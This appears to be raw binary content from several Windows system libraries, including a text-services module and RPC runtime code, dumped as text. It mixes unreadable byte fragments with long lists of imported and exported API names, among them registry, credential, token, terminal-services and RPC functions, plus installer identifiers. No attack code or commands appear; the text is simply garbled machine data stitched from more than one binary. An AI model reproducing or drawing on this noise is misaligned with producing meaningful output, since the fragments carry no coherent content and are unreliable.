`"w gur2dflt `t!w gjr2dflt `t!w gjr2dflt `g"w `"w ory2dflt `t!w q!w tel2dflt `t!w q!w@ knd2dflt `t!w q!wP mlm2dflt `t!w q!w` arabFAR `g"w `"w warabURD `g"w `"w """""" ###""""""###$###$%###%###$%&### )###*)###*+)###+)###%)###*+)&###,-)...//,/-//)/...,-0)...,-01)...,-1)...,-2)...,-01)3... 444555666 ' ( )777888999:::; <<<>=?@A444CBDEF555CCCF555G666 8#9": 95| #wt6 _^[] h"I!wd #w1E Y__^[ hgG!wh #w^_[ QRPh PRVW QhGSUBW tV_^[ PhGSUBQR QhGSUBW M$RP M RP 0_^[ } f; PhGDEF PQRV WRVP RPQV SetupAPI QSVW Kw`VWw QSVW $Yw3 `MRw MRwpMRw $Yw3 xaWh HKw@ Kw MRw VWwPNRw@MRw VWh$ QQSV3 Kw_^ Y:3A: QQSVW3 Yw_^ Yw^@[ F5JM^ t\SWP Yw_^ YwJy AcquireSRWLockExclusive ReleaseSRWLockExclusive (*Yw 8*Yw H*Yw X*Yw 3)6{ Ywu.j( $Yw3 Ywhh *Qw DtBSV Kwh< $YwVW Yw_^ 8IKw `IKw DJKw G@|IKw )MwpFRw 8JKw hP:Rwd $Yw1E SSSj QQSV Ywh0 0(Yw Yw_V 8DKw3 t1Sh 8DKw SVWh EKwPVh Yw_^[ $Yw3 93v& F;3r @_^[ $Yw3 8DKw 8DKw Kw9E _^[] $Yw3 8DKwW 8DKw =PLKw =PLKw 8DKw =@DKw PLKw 8DKw 8DKw 8DKw F0QW vd9y $Yw3 8DKw3 @PhtG PjLwPh jLwQ Yw_^ $Yw3 osWA _^[] @DKw 8DKw =PLKw =PLKw 8DKw PKw t195 1Ywj $Yw3 Ywv-S3 K$)K(t @_^[ ZKwWP F4uU h ZKw h ZKw $Yw3 h/uVh .RwV /RwV t h4/RwV hh/RwV It1It) t It QQSV y+VW umV3 PVVh =(5Yw Vhp2Rwh 5(5Yw Ph(5Yw (5Yw (5Yw^ SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings Redirect t+QQ Yw_^] HKw@ \4Rw (4Rw 8/Nw tGNw dGNw TGNw C 8FNw C$ FNw C(DGNw (DKw Ywh 0%Yw $Yw $Ywj $Ywj 0%Yw $Yw _^[] 9RwhP:Rwd $Yw1E KwPh Y_^[ Y_^[ h@*Kwh QRPh QRPh$ QRPh QRPh QRPh$ QRPhD Qhh[Mw eSwh PSSh tMj$ j Y3 YwPh dSwW YwPh dSwh hTdSw F,HUMw F0 t hFFIA hCFIA h IVA j(hFME F,|cSw F,@cSw ;Ywv$ 0Yw;5 ;Ywr 3Ywv& (Yw9 3Ywr 2YwV 2Ywk 2YwSV 2Yw@; 2Yw^ 2YwV 2Ywk 2YwSV 2Yw@; 2Yw^ SWVj (YwZ QQSVW QSVW XOwPhpWOw Vj*Y _^[] H9Yw H9Yw Ywt4G =,9Yw YwuQ3 ,9Yw ,9Yw X9Yw T9Yw %X9Yw %T9Yw HtkHtBH <9YwG H9Yw}Z <9Ywt <9Yw 89Yw <9Yw 89Yw <9Yw3 $Yw3 PShp E(SVW t+Iu+ u$SQ )_^[] _[^] QSVW P9Yw P9Yw P9Yw P9Yw3 (DKwV3 pWOw ?RwVj(Z ?RwSj(Z QSVW SQQQQj QQSPj Yw_^[ PQPW3 $Yw3 bVVVVV l3YwS2 l3Yw %l3Yw $Yw3 h3Yw h3Yw %h3Yw d3Yw d3Yw %d3Yw p3Yw p3Yw %p3Yw 0RRP ,1Yw ,1Yw t Qj $Yw3 =,1Yw YwVW ,1Yw ,1Ywt t"VWWhx VVhx QVQj Yw^] QhX;Xw h(DKw $Yw3 jbPf j2PhX PhLRw >Rw :Rw@>Rw :Rw vKw ;Rw ;Rw OwP>Rw0;Rw `;Rw@;Rw` Ow xKwP;Rw vKwP!Ow p;Rw Rwp>Rw ;Rw`>Rw ?RwP fwe'`w fwe'`we'`we'`we'`w DXhwV LXhw $Xhw %$Xhw ,`hw 95 !hwH Phw` SVWh8|`whT hP>`w `wWV `wWV `wWV cwWV cwWV cwSWV cwh P>`wV Abwh 8|`wWhT hP>`w `wWV `wWV `wWV cwWV cwWV cwSWV cwh PhP>`w hP>`wV Abwh @_^] @_^] API-MS-Win-Security-SDDL-L1-1-0.dll ConvertStringSecurityDescriptorToSecurityDescriptorW ConvertSidToStringSidW IMM32.dll GDI32.dll USER32.dll ntdll.dll KERNEL32.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll msvcrt.dll memset _CIsqrt wcstoul memmove _vsnwprintf memcpy _ftol2_sse _XcptFilter malloc free _initterm _amsg_exit _except_handler4_common _unlock __dllonexit _lock _onexit _vsnprintf RegSetValueExW RegOpenCurrentUser RegGetValueW RegCreateKeyExW RegOpenKeyExW RegQueryValueExW RegCloseKey RegDeleteKeyExW RegEnumKeyExW RegDeleteValueW RegQueryInfoKeyW RegEnumValueW GetCurrentProcess TlsFree TlsAlloc GetCurrentProcessId TlsSetValue ExitThread CreateThread TerminateProcess GetCurrentThreadId OpenProcessToken TlsGetValue FreeSid AllocateAndInitializeSid CheckTokenMembership GetSidSubAuthority GetSidSubAuthorityCount GetTokenInformation UnhandledExceptionFilter SetUnhandledExceptionFilter LocalReAlloc IsDBCSLeadByteEx WideCharToMultiByte GetACP GetSystemTimeAsFileTime QueryPerformanceCounter LoadLibraryExA InterlockedCompareExchange DelayLoadFailureHook GetModuleHandleW LoadLibraryW GetProcAddress GetSystemInfo GetLocaleInfoW CreateFileMappingW OpenFileMappingW MapViewOfFile UnmapViewOfFile FlushViewOfFile DebugBreak GlobalAlloc GlobalFree DeleteCriticalSection InitializeCriticalSectionAndSpinCount InterlockedExchange LocalFree GetModuleFileNameW GetFullPathNameW Sleep GetTickCount MultiByteToWideChar LCMapStringW DeactivateActCtx ActivateActCtx ReleaseActCtx CreateActCtxW GetVersionExW CreateProcessW LoadLibraryExW GetUserDefaultUILanguage GetSystemDefaultLangID LocalAlloc GetSystemWindowsDirectoryW GetSystemDirectoryW GetLocaleInfoA GlobalLock GlobalUnlock FlsSetValue CompareStringW OpenProcess GetSystemDefaultLCID lstrcmpW FreeLibrary DeleteAtom CompareStringOrdinal GetLastError OpenMutexW FindAtomW AddAtomW FlsFree FlsAlloc OpenEventW CloseHandle WaitForSingleObject SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection CreateMutexW lstrlenW ExpandEnvironmentStringsW GetEnvironmentVariableW ReleaseMutex SetFilePointer lstrlenA GetLocalTime InterlockedDecrement CreateEventW CompareStringA InterlockedIncrement EtwEventUnregister EtwEventRegister RtlDosPathNameToNtPathName_U NtCreateFile RtlFreeUnicodeString NtQueryInformationProcess RtlFormatCurrentUserKeyPath RtlInitUnicodeString NtOpenKey NtQueryValueKey NtClose RtlUnhandledExceptionFilter EtwEventWrite EtwEventEnabled WinSqmAddToStream NtAlpcDeletePortSection NtAlpcCreateSectionView NtAlpcCreatePortSection AlpcGetMessageAttribute NtAlpcConnectPort NtAlpcSendWaitReceivePort NtAlpcCancelMessage NtAlpcAcceptConnectPort NtAlpcDeleteSectionView NtAlpcCreatePort AlpcInitializeMessageAttribute LdrUnlockLoaderLock LdrLockLoaderLock NtWriteFile RtlDllShutdownInProgress CopyImage SetWindowLongW ReleaseDC GetDC DestroyMenu TrackPopupMenuEx CreatePopupMenu LoadImageW PrivateExtractIconsW CopyIcon GetSysColor GetActiveWindow InsertMenuItemW PeekMessageA GetMessageA GetMessageW SetThreadDesktop GetKeyboardLayoutList LoadKeyboardLayoutW CreateIconIndirect GetIconInfo DestroyIcon CreateWindowExW ChangeWindowMessageFilterEx MsgWaitForMultipleObjects RegisterClassExW DefWindowProcW DispatchMessageW FindWindowExW GetWindow GetClassNameW RealGetWindowClassW WaitForInputIdle GetKeyboardState SetWinEventHook GetGUIThreadInfo KillTimer CharNextW ReleaseCapture SetCapture AdjustWindowRectEx IsWindowInDestroy GetProcessWindowStation GetThreadDesktop UnhookWinEvent GetSystemMetrics SystemParametersInfoW GetWindowLongW ActivateKeyboardLayout InSendMessageEx GetParent EnumThreadWindows GetClassLongW IsWindowVisible GetCursorPos GetKeyState IsWindow DestroyWindow PeekMessageW PostQuitMessage GetQueueStatus GetFocus SendMessageW PostMessageW FindWindowW GetWindowThreadProcessId PostThreadMessageW RegisterWindowMessageW ChangeWindowMessageFilter SetTimer GetKeyboardLayout LoadStringW DrawTextExW GetMessagePos GetUserObjectInformationW SetCursor GetDoubleClickTime UpdateLayeredWindow GetMonitorInfoW MonitorFromRect MonitorFromPoint AnimateWindow FillRect SetRect DrawStateW DrawIconEx FrameRect InflateRect DrawEdge OffsetRect LoadCursorW LoadIconW GetClassInfoExW UnregisterClassW ToUnicode InvalidateRect ScreenToClient ClientToScreen PtInRect GetClientRect GetWindowRect ShowWindow RemovePropW MoveWindow SetPropW SetWindowPos MapWindowPoints EndPaint BeginPaint IsWindowUnicode keybd_event IsRectEmpty EqualRect SendMessageTimeoutW GetCaretBlinkTime SetRectEmpty IntersectRect SetLayeredWindowAttributes GetCursor SetWindowRgn WindowFromPoint SetBkColor SetBkMode CreatePen SetLayout BitBlt CreateCompatibleBitmap CreateBrushIndirect ExtTextOutA SetTextAlign GetTextAlign GetTextExtentPointA CreateFontW SetTextColor ExtTextOutW GetTextExtentPoint32W CreateFontIndirectW GetTextMetricsW GetStockObject GetDIBits GetDeviceCaps GetTextCharsetInfo TranslateCharsetInfo CreateBitmap GetBitmapBits GetObjectW CreateDIBSection DeleteDC SelectObject CreateDCW CreateCompatibleDC DeleteObject SetViewportOrgEx CreateSolidBrush GetTextColor LineTo MoveToEx GetCurrentObject Polyline ExtCreatePen PatBlt ImmCreateIMCC CtfImmLastEnabledWndDestroy ImmGetDefaultIMEWnd CtfImmIsCiceroStartedInThread CtfImmGetTMAEFlags CtfImmCoUninitialize CtfImmLeaveCoInitCountSkipMode CtfImmEnterCoInitCountSkipMode CtfImmSetCiceroStartInThread ImmGetHotKey ImmReleaseContext ImmNotifyIME ImmGetContext ImmGetConversionStatus ImmGetOpenStatus ImmGetImeMenuItemsW ImmGetIMEFileNameW ImmLockIMC ImmUnlockIMC ImmLockIMCC ImmUnlockIMCC ImmGetIMCCSize ImmDestroyIMCC ImmSetConversionStatus ImmGetAppCompatFlags ImmGetProperty ImmEnumInputContext CtfImmAppCompatEnableIMEonProtectedCode ImmSetCompositionStringW ImmGetCompositionStringW ImmRequestMessageW ImmReSizeIMCC CtfImmGenerateMessage ImmGetCompositionFontW ImmSetOpenStatus RSDSP msctf.pdb Bbw Cbw !This program cannot be run in DOS mode. Rich' .text `.data .rsrc @.reloc 5,pywW jD[SP Vh,pyw @0Vj @0Vj 5,pyw N,QP j0h #mw |Wf9} |?f9} HSV3 f9tJ f9t_ [j@_ mw_^[ $pyw h$pyw GBB; DuplicateEncryptionInfoFile DecryptFileW EncryptFileW GetUserNameW RevertToSelf CheckTokenMembership CM_Open_DevNode_Key CM_Locate_DevNodeW WTHelperGetProvSignerFromChain WTHelperProvDataFromStateData WinVerifyTrust CryptCATAdminReleaseCatalogContext CryptCATCatalogInfoFromContext CryptCATAdminEnumCatalogFromHash CryptCATAdminCalcHashFromFileHandle CryptCATAdminReleaseContext l(mw1^ww@(mwJ^ww (mwJ^ww (mw1^ww twwCreateXmlWriterOutputWithEncodingName CreateXmlWriterOutputWithEncodingCodePage CreateXmlWriter CreateXmlReaderInputWithEncodingName CreateXmlReaderInputWithEncodingCodePage CreateXmlReader -mwZmww -mwiiww ww|-mw wwl-mwZ_wwX-mw ww@-mww_ww$-mww_ww -mw]kww ,mwe ,mww_ww ,mw]kww _ww`,mw]kwwH,mw _ww(,mw +mww_ww _wwx+mw ewwd+mw ewwP+mwe ww<+mww_ww$+mwZmww _ww|*mw wwh*mw wwH*mw ww0*mw )mw]kwwWSDXMLGetValueFromAny WSDXMLGetNameFromBuiltinNamespace WSDXMLCreateContext WSDXMLCleanupElement WSDXMLBuildAnyForSingleElement WSDXMLAddSibling WSDXMLAddChild WSDUriEncode WSDUriDecode WSDSetConfigurationOption WSDRemoveFirewallCheck WSDProcessFault WSDNotifyNetworkChange WSDGetConfigurationOption WSDGenerateRandomDelay WSDGenerateFaultEx WSDGenerateFault WSDFreeLinkedMemory WSDDetachLinkedMemory WSDCreateUdpTransport WSDCreateUdpMessageParameters WSDCreateUdpAddress WSDCreateOutboundAttachment WSDCreateMetadataAgent WSDCreateHttpTransport WSDCreateHttpMessageParameters WSDCreateHttpAddress WSDCreateDiscoveryPublisher2 WSDCreateDiscoveryPublisher WSDCreateDiscoveryProvider2 WSDCreateDiscoveryProvider WSDCreateDeviceProxyAdvanced WSDCreateDeviceProxy2 WSDCreateDeviceProxy WSDCreateDeviceHostAdvanced WSDCreateDeviceHost2 WSDCreateDeviceHost WSDCopyNameList WSDCopyEndpoint WSDCompareEndpoints WSDCancelNetworkChangeNotify WSDAttachLinkedMemory WSDAllocateLinkedMemory WSDAddFirewallCheck "`ww "`ww "`ww "`ww aww pw 9x0t @@f; =,uyw @0Qj wywSf 0uyw _^[] ,uywW ryw; ^[_] wywV ,uyw FpwV LOAD: GETMODULEFILENAME failed PID=%ld | stringID=%ld | str=%S | flags=%d | hr = %X @FFf @NNf BG@@f pyw3 @0Vj zuKd t7Hu j%Xjp3 j7Xjt SVW3 VVVVh tVjt SVW3 t`VVj mw9} taSWh ,uyw rywt mw_[^ @WWV PSWW _^[] pyw3 ||Sj$ @_^[ Pj"j @@f; t7f9 @@Nu Q%$jpwPV f9\Q mw_^[ G_^] $mpw. QPPP f9\A f9\A @0VS pyw3 joSWV @SV3 mwj8 @0SV pyw3 @0Wj mw_^] jHh( @0SV |5VS @0SW mw^[9} pyw3 _^[] QQSVW pyw3 mwh0 mw;A CCf; j`h0 9] t 9]$ u,9] t' mw9] mw9] _^[] AABBf _^[] t*9M 9] t pwVh 5duyw^ j X `uyw huyw Duyw pyw3 QSVW FCCf Duyw uIj SQRP pyw3 huyw {yw_ pyw3 9X,t ({yw @0QV mwhD |3VVV mw_^ t)jP j0Zf 4SVW j\GV j\PG @Y@Y f o QQSVW mw_^[ j h8 QQSV3 mwhLdrwW h8drwW j\^f 4G@;E @0Qj PWVh4 ^f9tH f9p` ?t f; j-Yf9H& f9H0 f9H: f9HD j?Xj drwf PWVh4 @0V3 4G@BAA;E t:GGIu @0Vj pyw3 @0Qj mw9N BasepCreateActCtx SXS: %s() BasepSxsCreateStreams() failed H(;H tqWj t0Wjx E 9C E ;C mwYY wyw; _^[] pyw3 PWSS t 9U mwQR uAh@ pyw3 pyw3 pyw3 LOAD: INIT failed PID=%ld | stringID=%ld | str=%S | flags=%d | hr = %X pyw3 t>VWS ^_[] t 9_ mw_^[ @@f; t:j@ QQSV Xj(Y;M pyw3 t/Vj 9N$t FRf; f9Nvu FD;F8s Fh;F\s ;F8sA ;F8s ;F\sA ;F\s mw9^< FD;F8 Fh;F\ Fhf9 @_^[] pyw3 Fhf9 FD;F8 Fh;F\ pyw3 t ;M pyw3 pyw3 pyw3 t,9u SVW3 _^[] pyw3 9u u te9u mwIt% H@@; j Xf htcf Ht]f pyw3 @_^[ PSVj 958wyw pyw3 X4f;Y4u X0f;Y0t f [_^] [_^] [_^] =0uyw qwc^ww qwc^ww ^wwh qw2_wwP qw2_ww8 qw2_ww qw2_ww ^wwx ^wwP ^ww8 qww^ww qww^ww qw2_ww qw2_wwx qw2_ww\ qw2_wwH qw2_ww4 qw2_ww qwF_ww qwF_ww qwc^ww qwc^wwx qw2_wwd qw2_wwP ^ww0 _wwh ^wwP ^ww4 qw2_ww ^wwWTSWaitSystemEvent WTSVirtualChannelWrite WTSVirtualChannelRead WTSVirtualChannelQuery WTSVirtualChannelPurgeOutput WTSVirtualChannelPurgeInput WTSVirtualChannelOpenEx WTSVirtualChannelOpen WTSVirtualChannelClose WTSUnRegisterSessionNotificationEx WTSUnRegisterSessionNotification WTSTerminateProcess WTSStopRemoteControlSession WTSStartRemoteControlSessionW WTSStartRemoteControlSessionA WTSShutdownSystem WTSSetUserConfigW WTSSetUserConfigA WTSSetListenerSecurityW WTSSetListenerSecurityA WTSSendMessageW WTSSendMessageA WTSRegisterSessionNotificationEx WTSRegisterSessionNotification WTSQueryUserToken WTSQueryUserConfigW WTSQueryUserConfigA WTSQuerySessionInformationW WTSQuerySessionInformationA WTSQueryListenerConfigW WTSQueryListenerConfigA WTSOpenServerW WTSOpenServerExW WTSOpenServerExA WTSOpenServerA WTSLogoffSession WTSGetListenerSecurityW WTSGetListenerSecurityA WTSFreeMemoryExW WTSFreeMemoryExA WTSFreeMemory WTSEnumerateSessionsW WTSEnumerateSessionsExW WTSEnumerateSessionsExA WTSEnumerateSessionsA WTSEnumerateProcessesW WTSEnumerateProcessesExW WTSEnumerateProcessesExA WTSEnumerateProcessesA WTSEnumerateListenersW WTSEnumerateListenersA WTSDisconnectSession WTSCreateListenerW WTSCreateListenerA WTSConnectSessionW WTSConnectSessionA WTSCloseServer pyw1E Y__^[ pyw3 pyw3 =Auyw jXhP mw9} ,{yw {yw ${yw mw9} t f9 pyw3 j,hp xx9u t 9u QQV3 95,wyw mwVVh uywV j(h` t69E AACCN 9_^[] jHh8 t 9] SVWt mwYY _^[] twain_32.dll mw95 wywu pqwh< @uywh |uyw pywhd qwh8 pywf Buyw; rywj (pyw pyw3 h vyw ~ _^3 pyw^u VWh@pyw w(h syw E syw^ pyw3 F ^[ pyw3 Auyw Wh syw >_^] ({yw ${yw Xpyw] ,SVW mwhX |ch< PVSj PVSj t!Vj t 9M E$_] u 9] pyw3 @0VW {ywPh mwSWV mw_^9] 5|uywh |uyw ,VWj pyw1E pyw3 uJ9^ uE9^ u@9^( t f; ^l9_ Ntf; FPf;Ft FPf;Ft vyw rwjD h vyw ]{qw "Ypw^] VW9E t89G t39E t.9E 9FPu _^[] _^[] rwjDP OAABB rwjD WVVVj VVVj _^[] pyw3 t$f9 FFJu @@AA 9_^] _^[] pyw8 u u,j u j j\Xf jH^VS u 9] jXh pyw3 mwhX pyw3 =Tuyw hpwyw Tuyw; =Tuyw jp^V tDSj uyw9 mwhpwyw h`!rw hh!rwj !rwj u 9] uywSh uywSh uywSh uywSh Tuyw QQSVW3 9=luyw 9=Huyw Luyw_^[ pyw3 j hx#rw Php#rwW j\Xf x"rw pyw3 Puyw SVW3 puywu puywhpuyw wywG Ph 'rw mw=# XSWj Xf j"Xf (rwj h(rwj j"Xf j$Xf D(rw pyw3 _^[] pyw3 \pywS3 pyw3 EP_^[ lwywW3 _^[] pyw3 pyw3 d2rw pyw3 pyw3 5lpyw 7rww E,_^[ >_^] KFFGG mwf9E pyw3 xwyw; t" 9~4t f91u& J,^] P`rwV @arw \\rw ,\rw 8[rwE ZrwS arwV Zrwc ZrwE P(SVW F,+G @0Wj @0S3 `t f x&-u x0-u x:-u j`PS j\Xf CbPd pyw3 PWWh mwRP pyw3 SVW3 WWW3 <6WP \t"f hLdrwV mwh8drwV j\^f9 HHt f94At tR9] pyw3 QSSh pwrwJ^wwXwrw$swwDwrw ww0wrw5-ow$wrwZmww wrw(pww wrwKpww vrwAxow vrwFsww vrw`sww vrwI vrw5-owxvrw5-owdvrw wwPvrw jww@vrw ww0vrw5-ow$vrw5-ow vrw5-ow vrw5-ow urw5-ow urw5-ow urw5-ow urw5-owxurwZmwwdurw wwTurw5-owDurw eww4urw eww$urw urw5-ow trw5-owHashKeyExternal DSInstanceFromSetupEx DSInstanceFromNameEx DSInstanceFromNTDSAddrEx DSInstanceCompare DNSHostNameValueCheckForNetlogon DBDsReplBackupUpdate CrackSingleName CountNameParts ConvertReplicaLinkToNative AttrTypeToKey AppendRDN eww0 wwL&mwt ewwP %mwP eww4 eww, 8pwt ww(9pw ww,&mw rwb(ow4 rw*cww( rw*cww ww<&mwF xww@ xww, owjoww| wwSaferRecordEventLogEntry SaferCloseLevel SaferComputeTokenFromLevel SaferIdentifyLevel WriteEncryptedFileRaw WmiReceiveNotificationsW WmiQuerySingleInstanceW WmiQuerySingleInstanceMultipleW WmiQueryGuidInformation WmiQueryAllDataW WmiQueryAllDataMultipleW WmiOpenBlock WmiMofEnumerateResourcesW WmiFreeBuffer WmiCloseBlock UpdateTraceW UnregisterTraceGuids UnregisterIdleTask UnlockServiceDatabase TreeSetNamedSecurityInfoW TreeResetNamedSecurityInfoW TraceMessageVa TraceMessage TraceEvent SystemFunction033 SystemFunction032 SystemFunction031 ntHwProfileW GetAclInformation GetAce FreeSid FreeEncryptionCertificateHashList FreeEncryptedFileKeyInfo FlushTraceW FileEncryptionStatusW EventWriteTransfer EventWriteString EventWriteStartScenario EventWriteEndScenario EventWrite EventSetInformation EventProviderEnabled EventEnabled EventAccessRemove EventAccessQuery EventAccessControl EqualSid EqualDomainSid EnumerateTraceGuidsEx EnumServicesStatusW EnumServicesStatusExW EnumDependentServicesW EnumDependentServicesA EncryptedFileKeyInfo EnableTraceEx EnableTrace ElfReportEventW ElfRegisterEventSourceW ElfDeregisterEventSource DuplicateTokenEx DuplicateToken DeregisterEventSource DeleteAce CredpDecodeCredential CredpConvertTargetInfo CredpConvertCredential CredWriteW CredWriteDomainCredentialsW CredWriteA CredUnprotectW CredUnmarshalCredentialW CredUnmarshalCredentialA CredReadW CredReadDomainCredentialsW CredReadByTokenHandle CredProtectW CredProfileUnloaded CredProfileLoaded CredMarshalCredentialW CredMarshalCredentialA CredIsProtectedW CredIsMarshaledCredentialW CredIsMarshaledCredentialA CredGetTargetInfoW CredGetSessionTypes CredFree CredEnumerateW CredDeleteW CredDeleteA CreateWellKnownSid CreateProcessWithTokenW CreateProcessWithLogonW CreateProcessAsUserW CopySid ConvertStringSidToSidA ConvertStringSecurityDescriptorToSecurityDescriptorA ConvertStringSDToSDDomainW ConvertStringSDToSDDomainA ConvertSidToStringSidA ConvertSecurityDescriptorToStringSecurityDescriptorA ControlTraceW CommandLineFromMsiDescriptor CloseTrace CloseEventLog CloseEncryptedFileRaw ClearEventLogW BuildTrusteeWithSidW BuildTrusteeWithObjectsAndSidW BuildTrusteeWithNameW BuildSecurityDescriptorW BuildImpersonateTrusteeW BuildExplicitAccessWithNameW AuditQuerySystemPolicy AuditFree AuditComputeEffectivePolicyBySid AllocateAndInitializeSid AdjustTokenPrivileges AddAce AddAccessDeniedAceEx AddAccessDeniedAce AddAccessAllowedAceEx AddAccessAllowedAce AccessCheck PSSS QQV3 tJj@ wyw; |wywV Xuyw wywV 4wyw; _[^] pyw3 Pj1j uyw; t89E AACCN _^[] |0SVW pyw3 pyw3 pyw3 pyw3 pyw3 uyw)N uyw) @@Nu sth@pyw h@pyw pyw3 pyw3 |0SVW pyw3 ] W3 t 9} 9](t Gentee.Installer RR.Raphael.Install.Builder ThraexSoftware.AstrumInstallWizard Roshal.WinRAR.WinRAR Illustrate.Spoon.Installer InstallShield.Setup Nullsoft.NSIS JR.Inno.Setup `uyw j[Xf @@BB j]Yf @@BB j=Yf @@BB mwSS t j) 4SVW QVPj @_^[ VWt> @_^] pyw3 mwYY@@j*Yf } f; PShV sif; $SVW pyw3 Jj0JNYf t WVRP j Y9M j"ZAA j Zf; j Zf; 9"u'AA >swPV mwYY mwYY mwYY >swW C\f9 CdPjD CHjhh 9C | mwt =sw. @swtGVW QPPP @\+A h rsw t09M pyw3 pyw3 mw_^] Gf9T0 pyw3 wswj wswj PVQj VVVV mwSSS F,hhwyw PSSS SSj`j PSVjL pw^f; wwRjpw wyw@ n|@% -G%y x"rw D)uw )uw$mpw !This program cannot be run in DOS mode. Rich .text `.orpc `.data .rsrc @.reloc NVrw {8qw 8qwo pwWt qwblqw 'pw9 G;= L$$QP D$,; wSV3 u39u {wncalrpc:[epmapper] WVjEjW3 {wWSh\ wWWWWh {w9~ F$PVh 9~Xt FVSj+jr @_^[] VjpjG3 vPjDjL vPjDjL j[Yf PVj=jhj"X WuIAA SVWj SW9N O}wV QSVW3 9~u QSVW vPjqjLj KX9H L$0QP D$4W 9D$0 {wVW {w9] _^Y] SVW3 VjLjL _^[] VjLjL _^Y] QQS3 QQSV Wj-jr {w^[ SWjRjo3 {PFV u;!E _^[] QSVW QQSVW SWjDjn3 QQSVW3 9_Tu PWjdjn QVWj VjDjc3 VSjdja3 PjDjv Vj-ja 9~`u'9~du/WVjNja3 {w_[ HxSV 9V4u j-jG 4SVW t1hH WjRjL3 vPjqjL ~TW3 VjQja FxPj SVWj hH hH QQSV wZ_^[ WSPV {w_^[] SVW3 UVWS [_^] {wVj Wj+jr D$0P D$$@V 9L$ Pp~w Pp~w D$8P L$(W D$(@V Pp~w Pp~w #D$(_ 9^4uu W9^0t u _^[ 9w,t{9u w49u f!G" SVWj _^[] D$ P \"}w Pp~w Pp~w CRSUu~j,j _[9E r8WPj QQS3 f;F,W} X,_^[] _^[Y] {w_^ C VW VPjdjL3 _^[] C@WP {w_^[ ~@W3 F|VjQjA {w_^[] _^[] {w_[] D$$P C WjKjF @_^Y] WVjNjC PVj=jcj"X D$HSVW jkja L$T_^[3 _^[] {w_^ hX 3 |wVw}w udh {wj@ GPSV PjCjL UQPXY]Y[ URPQQh L$,3 w9E t QSVW _^[Y] O}wV {w9] 0u~w I_RpcExtInitializeExtensionPoint QQSV L$\_ XSVW jCjL wuI95 tBVP t695 QSVW3 9x8u0 SVWj _^[t W,9] WWWW _^[] 9sHt VWh8 jajL {wVj {w=" SVWu tBjX u jL _^[Y] $SVW3 9}$t h0d}w PWWj $R}wl 8R}wd TR}wd d}w\ D$$; }wCh }wP uwuT PPPj PPPj _[Y] _^[] _^[] QQSV Qjsjc SVW3 @@f; Stck 8Heap jCjL QQSV WjCjL3 jHXf wwr; Y@_^[ @_^[ rxW3 _^[] HxSV wPjDjL PjCjL3 CPW3 _^[] QSVW u!!Fh F"^3 u>GG $~wW {w^[] :}wP NdrOleInitializeExtension wSWV wSWV QS[\u& u 9M _[^] QS[\u VWtb QS[\ _^Y] Pp~w Pp~w Pp~w t 9E _^[] wWSV QS[\ CRSU User 9^0u/ PPPQP $~wQj \pipe\epmapper ,SVW3 |$(9 D$ Pj 9|$ D$4t PSjo D$$jh3 0t"h D$0Pj 9|$0 j:Xf j[Xf ^[Y] f92t j:Yf j[Yf f91t j,Yf j]Yf _^[] @@AA tPj Y_^[Y] PWj=jcj"X Wjcjc 9;uA WWWWWj WWWWj Vjcjh t$(S F(SW3 t f9; PVj=jhj"X SI#M {w_^[] QSVW Wjdjh3 Vjdjc3 {w_^] ]_^[ 5|f}wRS |f}w {wQRPh Vj)j BBGGNK 095d _^[Y] QVW3 _^Y] l}wf l}w@@f l}wf l}w@f l}wf l}wAAf l}wf l}wf l}wf l}wf w m}w m}w QjqjL ^[Y] {w^Y] SVWP D$$PW P@PW {w9E QQSV _^[] GGHu Pp~w _^[] "~wV Pp~w PVj=jcj"X QSVW _^[Y] PWj=jcj"X _^[] |}wa%}w D$8f D$@t 9T$8 9D$0 9D$4 D$@f f!G" jdhX u%BB G"_^[ f!G" {w_^ SVWh0 SVW3 t 9} ND_^[] [_^] _^Y] j]Xf FFh| D$$WWWj WWWWj QSVW _^[] _^Y] 9!u= 9Lu0AA D$,u D$@P D$(+|$ 9L$$ Pp~w Pp~w #D$(_ D$(f F"^[ LSVW D$@P \$(CC L$(D{w Pp~w hH 0Whl0 hX 3 VWjfXjhf hX 3 WtUH wK~}w: wM7}wM7}wdh |wmp ~wK~}wmp 7}w]f w@u}w w*J}w m}w\"}w\"}w\"}w\"}w m}wM |wd^ J|wl_ w\"}wQH|w |wl_ }w!e <}w+g wOv}w K|wif }wif whK}w RPCRT4.dll CStdStubBuffer_AddRef CStdStubBuffer_Connect CStdStubBuffer_CountRefs CStdStubBuffer_DebugServerQueryInterface CStdStubBuffer_DebugServerRelease CStdStubBuffer_Disconnect CStdStubBuffer_Invoke CStdStubBuffer_IsIIDSupported CStdStubBuffer_QueryInterface CreateProxyFromTypeInfo CreateStubFromTypeInfo DceErrorInqTextA DceErrorInqTextW DllGetClassObject DllRegisterServer IUnknown_AddRef_Proxy IUnknown_QueryInterface_Proxy IUnknown_Release_Proxy I_RpcAllocate I_RpcAsyncAbortCall I_RpcAsyncSetHandle I_RpcBCacheAllocate I_RpcBCacheFree I_RpcBindingCopy I_RpcBindingCreateNP I_RpcBindingHandleToAsyncHandle I_RpcBindingInqCurrentModifiedId I_RpcBindingInqDynamicEndpoint I_RpcBindingInqDynamicEndpointA I_RpcBindingInqDynamicEndpointW I_RpcBindingInqLocalClientPID I_RpcBindingInqMarshalledTargetInfo I_RpcBindingInqSecurityContext I_RpcBindingInqSecurityContextKeyInfo I_RpcBindingInqTransportType I_RpcBindingInqWireIdForSnego I_RpcBindingIsClientLocal I_RpcBindingIsServerLocal I_RpcBindingToStaticStringBindingW I_RpcCertProcessAndProvision I_RpcClearMutex I_RpcCompleteAndFree I_RpcConnectionInqSockBuffSize I_RpcConnectionSetSockBuffSize I_RpcDeleteMutex I_RpcEnableWmiTrace I_RpcExceptionFilter I_RpcFilterDCOMActivation I_RpcFree I_RpcFreeBuffer I_RpcFreePipeBuffer I_RpcFwThisIsTheManager I_RpcGetBuffer I_RpcGetBufferWithObject I_RpcGetCurrentCallHandle I_RpcGetExtendedError I_RpcGetPortAllocationData I_RpcIfInqTransferSyntaxes I_RpcInitFwImports I_RpcInitHttpImports I_RpcInitImports I_RpcInitNdrImports I_RpcLogEvent I_RpcMapWin32Status I_RpcMarshalBindingHandleAndInterfaceForNDF I_RpcMgmtEnableDedicatedThreadPool I_RpcMgmtQueryDedicatedThreadPool I_RpcNDRCGetWireRepresentation I_RpcNDRSContextEmergencyCleanup 